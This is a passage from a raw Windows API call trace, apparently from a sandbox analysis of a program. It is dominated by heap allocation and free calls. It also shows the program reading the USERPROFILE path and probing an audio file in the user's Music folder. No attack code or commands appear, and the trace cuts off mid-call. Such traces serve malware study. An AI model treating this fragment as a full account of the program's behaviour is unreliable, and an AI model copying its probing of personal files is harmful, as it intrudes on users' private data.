hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1938 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0252.333] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa670 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0252.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.334] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0252.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0252.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x2420888 [0252.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0252.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0252.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1758 [0252.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0252.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6b8 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0252.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0252.336] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.336] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0252.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0252.337] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.337] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0252.337] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0252.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.338] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0252.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0252.338] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.338] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.338] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.338] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0252.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0252.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0252.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0252.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0252.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0252.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0252.339] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.339] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0252.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ce0 [0252.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0252.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0252.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0252.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.340] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.340] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.340] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0252.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0252.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0252.341] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0252.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0252.341] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0252.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.342] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0252.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0252.342] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0252.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0252.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0252.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0252.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0252.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.343] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.343] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0252.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.344] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0252.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0252.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0252.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.344] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0252.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0252.344] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.345] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0252.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0252.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.345] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0252.345] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0252.346] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0252.350] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0252.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.351] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\QeeT.m4a", lpFindFileData=0x8bf178 | out: lpFindFileData=0x8bf178*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5da723d0, ftCreationTime.dwHighDateTime=0x1d4d4de, ftLastAccessTime.dwLowDateTime=0xb43d00b0, ftLastAccessTime.dwHighDateTime=0x1d4d525, ftLastWriteTime.dwLowDateTime=0xb43d00b0, ftLastWriteTime.dwHighDateTime=0x1d4d525, nFileSizeHigh=0x0, nFileSizeLow=0x11122, dwReserved0=0x410530, dwReserved1=0xcbac, cFileName="QeeT.m4a", cAlternateFileName="")) returned 0xaa5660 [0252.351] FindClose (in: hFindFile=0xaa5660 | out: hFindFile=0xaa5660) returned 1 [0252.351] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.352] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.352] HeapFree (in: hHeap=0x25c0000, 